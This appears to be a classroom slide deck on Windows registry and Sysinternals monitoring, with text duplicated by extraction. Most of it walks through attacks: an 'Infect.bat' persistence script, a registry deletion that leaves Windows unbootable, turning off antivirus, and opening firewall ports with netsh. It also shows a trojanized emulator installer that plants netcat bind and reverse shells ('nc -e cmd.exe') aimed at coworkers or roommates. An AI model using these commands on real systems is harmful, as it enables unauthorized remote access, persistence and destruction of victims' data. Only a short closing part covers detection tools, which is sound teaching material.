System Monitoring with Sys-System Monitoring with Sys-Internals Internals
http://www.sys-internals.comhttp://www.sys-internals.com
Section 1: Registry Section 1: Registry Manipulation and Having Evil Manipulation and Having Evil
fun.fun. RegistryRegistry
- Part of windows containing program - Part of windows containing program info.info.- System settings stored in registry- System settings stored in registry- Replaced old startup systems- Replaced old startup systems
(Autoexec.bat, ini files)(Autoexec.bat, ini files)- Essential to Windows operation- Essential to Windows operation
StructureStructure- registry divided into hives- registry divided into hives- like a folder hierarchy - like a folder hierarchy - keys located in lower levels of hives- keys located in lower levels of hives
Parts of the RegisryParts of the Regisry HKEY_CURRENT_USER HKEY_CURRENT_USER
- information and profile of current user - information and profile of current user HKEY_USERS HKEY_USERS
- user profiles- user profiles HKEY_LOCAL_MACHINE HKEY_LOCAL_MACHINE
- configuration information particular to the - configuration information particular to the computercomputer
HKEY_CLASSES_ROOT HKEY_CLASSES_ROOT
- subclass of LOCAL_MACHINE: stores program - subclass of LOCAL_MACHINE: stores program informationinformation
HKEY_CURRENT_CONFIG HKEY_CURRENT_CONFIG
- hardware profiles- hardware profiles
SoftwareSoftware RegeditRegedit
- Built into windows- Built into windows- GUI registry modifyer- GUI registry modifyer
RegmonRegmon- Sys-internal that will monitors all registry - Sys-internal that will monitors all registry accesses and activities. accesses and activities. - Has filtering capabilities- Has filtering capabilities- Will be used to detect malicious keys and their - Will be used to detect malicious keys and their functionfunction
Batch FilesBatch Files- Can combine commands into simple program- Can combine commands into simple program
Jetico FirewallJetico Firewall- For simple key demonstration- For simple key demonstration
Structure of a KeyStructure of a Key
Name | Type | DataName | Type | Data
Appears like this in RegeditAppears like this in Regedit
Modifying KeysModifying Keys
1) Adding a key:1) Adding a key: REG ADD RegistryPath /V Name /d REG ADD RegistryPath /V Name /d
Data Data
2) Modifying an existing key:2) Modifying an existing key: REG UPDATE RegistryPath /V Name /d REG UPDATE RegistryPath /V Name /d
Data Data 3) Deleting a key: 3) Deleting a key: REG DELETE RegistryPath [/FORCE] REG DELETE RegistryPath [/FORCE]
Lab SituationLab Situation
Virus gets installed on a systemVirus gets installed on a system User deletes the virus, but on restart User deletes the virus, but on restart
virus comes backvirus comes back One way a hacker can do this is via One way a hacker can do this is via
the registrythe registry The following key location contains The following key location contains
startup program information:startup program information: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\RunCurrentVersion\Run
Re-installationRe-installation
Batch File: Infect.batBatch File: Infect.bat Infect.bat and virus on system in hidden Infect.bat and virus on system in hidden
folder.folder. Infect.bat copies virus to Windows, Infect.bat copies virus to Windows,
renames it to MrMalicious, and runs it. renames it to MrMalicious, and runs it. User sees virus in task manager, User sees virus in task manager,
searches hard drive and deletes searches hard drive and deletes MrMalicious, thinking he or she is da MrMalicious, thinking he or she is da bomb. bomb.
Uh-OhUh-Oh
Infect.bat re-infects the system on Infect.bat re-infects the system on startup because of startup registry key.startup because of startup registry key.
Hidden viral file is still on system. Hidden viral file is still on system. MrMalicious comes backMrMalicious comes back User is not da bombUser is not da bomb
Note: MrMalicious for this lab just takes Note: MrMalicious for this lab just takes up CPU time and runs in the up CPU time and runs in the background. background.
Viral CodeViral Code
reg add HKEY_LOCAL_MACHINE\SOFTWARE\reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Process Microsoft\Windows\CurrentVersion\Run /v Process /d "C:\WINDOWS\HiddenFolder\Infect.bat"/d "C:\WINDOWS\HiddenFolder\Infect.bat"
MD "C:\WINDOWS\HiddenFolder\"MD "C:\WINDOWS\HiddenFolder\"copy Infect.bat "C:\WINDOWS\HiddenFolder\"copy Infect.bat "C:\WINDOWS\HiddenFolder\"copy RenameMe.exe "C:\WINDOWS\HiddenFolder\"copy RenameMe.exe "C:\WINDOWS\HiddenFolder\"copy RenameMe.exe "C:\Windows\HiddenFolder\"copy RenameMe.exe "C:\Windows\HiddenFolder\"cd "C:\Windows"cd "C:\Windows"Ren RenameMe.exe "MrMalicious.exe"Ren RenameMe.exe "MrMalicious.exe"Start MrMalicious.exeStart MrMalicious.exeexitexit
Turning off Turning off Antivirus/FirewallsAntivirus/Firewalls
Before going over detection, we will Before going over detection, we will examine how to turn off important examine how to turn off important anti-viral programs.anti-viral programs.
Wouldn’t it be nice not to have to Wouldn’t it be nice not to have to deal with a victim’s firewall?deal with a victim’s firewall?
Removal of Startup Removal of Startup programsprograms
Simple ProcessSimple Process1.1. Delete all startup keys manually on Delete all startup keys manually on
hacker systemhacker system2.2. Backup key folder by exportingBackup key folder by exporting3.3. Have virus replace startup folder with Have virus replace startup folder with
empty backup.empty backup. Running registry backups (.reg) will Running registry backups (.reg) will
replace keys in the current locationreplace keys in the current location Could also use query command in Could also use query command in
software to remove all keys with string software to remove all keys with string “norton” or “zonealarm” in specified hive“norton” or “zonealarm” in specified hive
DetectionDetection
Regmon: GUI based registry loggerRegmon: GUI based registry logger Lots of registry accesses/second on Lots of registry accesses/second on
windows systemwindows system Typical program install requires Typical program install requires
150,000 registry accesses. 150,000 registry accesses. How can we find malicious keys with How can we find malicious keys with
so many reads/writes to registry?so many reads/writes to registry?
Filtering Cont’dFiltering Cont’d
User can filter out normal processes User can filter out normal processes such as Explorer.exe, svchost, etc. such as Explorer.exe, svchost, etc.
Logged entries can be cut down to Logged entries can be cut down to just a few hundred. just a few hundred.
Now easier to find where malicious Now easier to find where malicious keys have been added. keys have been added.
Evil Fun Time: Disable OSEvil Fun Time: Disable OS
Registry is key to operation of Registry is key to operation of windowswindows
Unfortunately, can be easily modified Unfortunately, can be easily modified to make windows unstable and to make windows unstable and unbootableunbootable
Easy way to make enemiesEasy way to make enemies
Not fun for victim machineNot fun for victim machine
“ “REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE /FORCE”/FORCE”
==
Recovery from Reg deletionRecovery from Reg deletion System not bootable even in safe mode after System not bootable even in safe mode after
previous line of code is run!!!previous line of code is run!!! In order to recover normal program operation, In order to recover normal program operation,
must have a backup copy of whole registrymust have a backup copy of whole registry Without backup copy, all programs not included Without backup copy, all programs not included
on Windows installation CD must be re-installedon Windows installation CD must be re-installed Advice: Start backing up your registryAdvice: Start backing up your registry Erunt is software that can back up and re-insert Erunt is software that can back up and re-insert
the whole registry easilythe whole registry easilyhttp://www.snapfiles.com/download/dlerunt.htmlhttp://www.snapfiles.com/download/dlerunt.html
Poking holes in the Firewall Poking holes in the Firewall from the command linefrom the command line
netsh firewall show portopeningnetsh firewall show portopening
Poking holes in the Firewall Poking holes in the Firewall from the command line cont.from the command line cont.
What happens when we try to use What happens when we try to use Netcat to listen on a closed port?Netcat to listen on a closed port?
Poking holes in the Firewall Poking holes in the Firewall from the command line cont.from the command line cont.
If set to not allow exceptions, reset the If set to not allow exceptions, reset the firewall to default– C:\netsh firewall resetfirewall to default– C:\netsh firewall reset
Firewall default allows exceptionsFirewall default allows exceptions After exceptions are allowed, add After exceptions are allowed, add
desired exceptiondesired exception C:\netsh firewall add portopening C:\netsh firewall add portopening
protocol = ALL port = 8633 name = nc protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = mode = ENABLE scope = ALL profile = ALLALL
Hypothetical ScenarioHypothetical Scenario
let us pretend we are a hacker with let us pretend we are a hacker with not so pleasant intentions operating not so pleasant intentions operating from a RedHat 7.2 machine. The from a RedHat 7.2 machine. The Windows XP machine is being Windows XP machine is being operated by either a Co-worker, operated by either a Co-worker, schoolmate, roommate, or anyone schoolmate, roommate, or anyone you can think of that would be found you can think of that would be found on the same network as you (i.e. no on the same network as you (i.e. no router is separating you). router is separating you).
Hypothetical Scenario cont.Hypothetical Scenario cont.
Suppose we give our friend the Suppose we give our friend the Windows XP user, a self extracting Windows XP user, a self extracting Zip program that installs the ZSNES Zip program that installs the ZSNES Super Nintendo Emulator. Super Nintendo Emulator. Unfortunatley for the Windows XP Unfortunatley for the Windows XP user, we have also made it so this user, we have also made it so this self extracting zip installs netcat, and self extracting zip installs netcat, and runs a c program we wrote named runs a c program we wrote named installer.exe.installer.exe.
How the 8633 Exploit worksHow the 8633 Exploit works
9 system calls9 system calls The first system call moves an .exe The first system call moves an .exe
called process to c:\Windows\called process to c:\Windows\system32system32
The second call executes process – k The second call executes process – k nc.exe, this process kills all instances nc.exe, this process kills all instances of Netcat in case the exploit has of Netcat in case the exploit has already been run on this machine so already been run on this machine so as not to cause an erroras not to cause an error
How the 8633 Exploit works How the 8633 Exploit works cont.cont.
The third call moves nc.exe to C:\The third call moves nc.exe to C:\Windows\system32, nc.exe is Netcat!Windows\system32, nc.exe is Netcat!
The fourth call moves server.exe to The fourth call moves server.exe to C:\Windows\system32C:\Windows\system32
The fifth call resets the Windows The fifth call resets the Windows firewall in case it is set to not allow firewall in case it is set to not allow any exceptions, c:\netsh firewall any exceptions, c:\netsh firewall resetreset
How the 8633 Exploit works How the 8633 Exploit works cont.cont.
The sixth system call is “C:\netsh firewall The sixth system call is “C:\netsh firewall add portopening protocol = ALL port = add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = 8633 name = nc mode = ENABLE scope = ALL profile = ALL” , which opens up the ALL profile = ALL” , which opens up the firewall on port 8633 for Netcat.firewall on port 8633 for Netcat.
The seventh system call, “reg add hklm\The seventh system call, “reg add hklm\SOFTWARE\Microsoft\Windows\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d CurrentVersion\Run /v update /t REG_SZ /d c:\windows\system32\server.exe /f”, adds c:\windows\system32\server.exe /f”, adds a key to the registry allowing server.exe to a key to the registry allowing server.exe to run whenever the computer is booted. run whenever the computer is booted.
Changing the Registry to run a Changing the Registry to run a program when starting program when starting
WindowsWindows The Windows XP registry has six registry keys designated for launching The Windows XP registry has six registry keys designated for launching programs when starting up the computer. They are:programs when starting up the computer. They are:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\Run - Launches program when specific user logs in- Launches program when specific user logs in HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce - Launches program when specific user logs in next time, then is removed from - Launches program when specific user logs in next time, then is removed from
thethe registryregistry HKLM\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows\CurrentVersion\Run - Launches program automatically at system startup * (key modified by - Launches program automatically at system startup * (key modified by
installer.c)installer.c) HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce - Launches program automatically at system startup on next startup, then is- Launches program automatically at system startup on next startup, then is Removed from the registry.Removed from the registry. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesHKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - Launches service automatically at system startup (e.g. AIM)- Launches service automatically at system startup (e.g. AIM) HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - Launches service automatically at system startup on next startup, then is- Launches service automatically at system startup on next startup, then is - Removed from the registry.- Removed from the registry.
How the 8633 Exploit works How the 8633 Exploit works cont.cont.
The Eighth system call runs Netcat. The Eighth system call runs Netcat. Because Netcat is run by nc.exe Because Netcat is run by nc.exe executable, it is difficult to run so the executable, it is difficult to run so the command prompt will close - command prompt will close - system("start /d \"c:\\windows\\system("start /d \"c:\\windows\\system32\\\" nc -L -p 8633 -e system32\\\" nc -L -p 8633 -e cmd.exe -d");cmd.exe -d");
The Ninth system call is just an exit The Ninth system call is just an exit command needed to close a second command needed to close a second instance of the cmd shell.instance of the cmd shell.
What server.exe does and What server.exe does and what Netcat is doingwhat Netcat is doing
Server.exe was added to the registry to run Server.exe was added to the registry to run every time the system boots by installer.exe. every time the system boots by installer.exe. Everytime the system is restarted, Netcat Everytime the system is restarted, Netcat runs listening on the port 8633 and shells to runs listening on the port 8633 and shells to cmd.exe when it is connected to by netcat cmd.exe when it is connected to by netcat from another machine.from another machine.
Netcat is run with the –L and –d options so Netcat is run with the –L and –d options so that it runs in silent mode, and opens itself that it runs in silent mode, and opens itself back up in listening mode when back up in listening mode when disconnected.disconnected.
C:\nc -L –p 8633 –e cmd.exe -dC:\nc -L –p 8633 –e cmd.exe -d
Files in the Zip file, and Files in the Zip file, and creating the self extractorcreating the self extractor
Going back to the Hypothetical Going back to the Hypothetical scenarioscenario
Thinking he is in for an exciting afternoon of Thinking he is in for an exciting afternoon of playing Super Mario World, and possibly playing Super Mario World, and possibly even a little Ogre Battle, the unsuspecting even a little Ogre Battle, the unsuspecting Windows XP user is more than happy to Windows XP user is more than happy to take and install the emulator you give him. take and install the emulator you give him. After he installs it, you have administrative After he installs it, you have administrative access to his machine, for as long is you are access to his machine, for as long is you are on the same network with him (assuming he on the same network with him (assuming he is not extremely knowledgeable of his is not extremely knowledgeable of his Registry, or Firewall, or doesn’t decide to Registry, or Firewall, or doesn’t decide to format his hard drive).format his hard drive).
How to access Our friend the How to access Our friend the Windows XP users computerWindows XP users computer
Since Netcat is listening on his Since Netcat is listening on his computer when ever the computer is computer when ever the computer is on, with the command C:\nc –L –p 8633 on, with the command C:\nc –L –p 8633 –e cmd.exe – d–e cmd.exe – d
All we have to do is run nc x.x.x.x All we have to do is run nc x.x.x.x 8633, where x.x.x.x is his i.p adress 8633, where x.x.x.x is his i.p adress and we have access.and we have access.
Why Port 8633Why Port 8633
Because Spelling out TODD Because Spelling out TODD numerically on cell phones etc, is numerically on cell phones etc, is done by 8-6-3-3done by 8-6-3-3
TODD is my name, and I came up TODD is my name, and I came up with this paticular exploit, and I had with this paticular exploit, and I had to pick a port so why not 8633to pick a port so why not 8633
A new ScenarioA new Scenario
Suppose we want to gain access to Suppose we want to gain access to our friend the Windows XP user’s our friend the Windows XP user’s computer (Who by the way is computer (Who by the way is probably not our friend, otherwise we probably not our friend, otherwise we wouldn’t be continuously hacking his wouldn’t be continuously hacking his computer), and this time he is not on computer), and this time he is not on the same network as we are. the same network as we are.
A new Scenario cont.A new Scenario cont.
In order to do this, we will edit our code In order to do this, we will edit our code slightly from the previous exploit. Rather slightly from the previous exploit. Rather than having the Windows user in listening than having the Windows user in listening mode, we will put our Linux machine in mode, we will put our Linux machine in listen mode and have his machine seek listen mode and have his machine seek out a connection with us. In both server.c, out a connection with us. In both server.c, and installer.c we will change and installer.c we will change
“ “c:\nc –L –p 8633 –e cmd.exe –d” to c:\nc –L –p 8633 –e cmd.exe –d” to
“ “c:\nc “our_i.p.” 80 –e cmd.exe –d”c:\nc “our_i.p.” 80 –e cmd.exe –d”
A new Scenario cont.A new Scenario cont.
Make sure our router is set to forward the Make sure our router is set to forward the traffic coming into port 80 to our machine.traffic coming into port 80 to our machine.
Then we initialize our machine in listen Then we initialize our machine in listen mode, with the command: mode, with the command:
#nc –vv –l –p 80#nc –vv –l –p 80
Then we wait Then we wait
One final example One final example
Running commands from one port Running commands from one port and recieveing on anotherand recieveing on another
We can use Netcat to send We can use Netcat to send commands through the cmd.exe commands through the cmd.exe shell, takeing commands in from one shell, takeing commands in from one port and sending them out anotherport and sending them out another
One final example cont.One final example cont.
Setting up two listening ports on your Setting up two listening ports on your machine machine
nc –vv –l –p 80nc –vv –l –p 80 nc –vv –l –p 25nc –vv –l –p 25 Then on the Windows machine run “nc Then on the Windows machine run “nc
x.x.x.x 80 | cmd.exe | nc x.x.x.x 25” where x.x.x.x 80 | cmd.exe | nc x.x.x.x 25” where x.x.x.x is your ip adress.x.x.x.x is your ip adress.
This allows you to run commands from port This allows you to run commands from port 80 and receive the results from port 2580 and receive the results from port 25
Section 4: Unleashing a Wild Section 4: Unleashing a Wild BoarBoar
Active Monitoring ToolsActive Monitoring Tools– Process ExplorerProcess Explorer
Activity LoggingActivity Logging– Registry MonitoringRegistry Monitoring– File MonitoringFile Monitoring– Network Monitoring Network Monitoring
Stack CallStack Call Logging TrafficLogging Traffic
Process ExplorerProcess Explorer
Process ExplorerProcess Explorer– Show CPU/Memory usageShow CPU/Memory usage– Show active network portsShow active network ports– Show process threadsShow process threads
EtherealEthereal
Logs network trafficLogs network traffic– Become familiar with extracting TCP flowsBecome familiar with extracting TCP flows
Registry/File MonitoringRegistry/File Monitoring
The File Monitoring Utilities is a clone of the The File Monitoring Utilities is a clone of the Registry Monitoring Utility.Registry Monitoring Utility.– What can you see?What can you see?
Process NameProcess Name Open & ClosesOpen & Closes Read & WriteRead & Write Attempts & FailuresAttempts & Failures
Top Related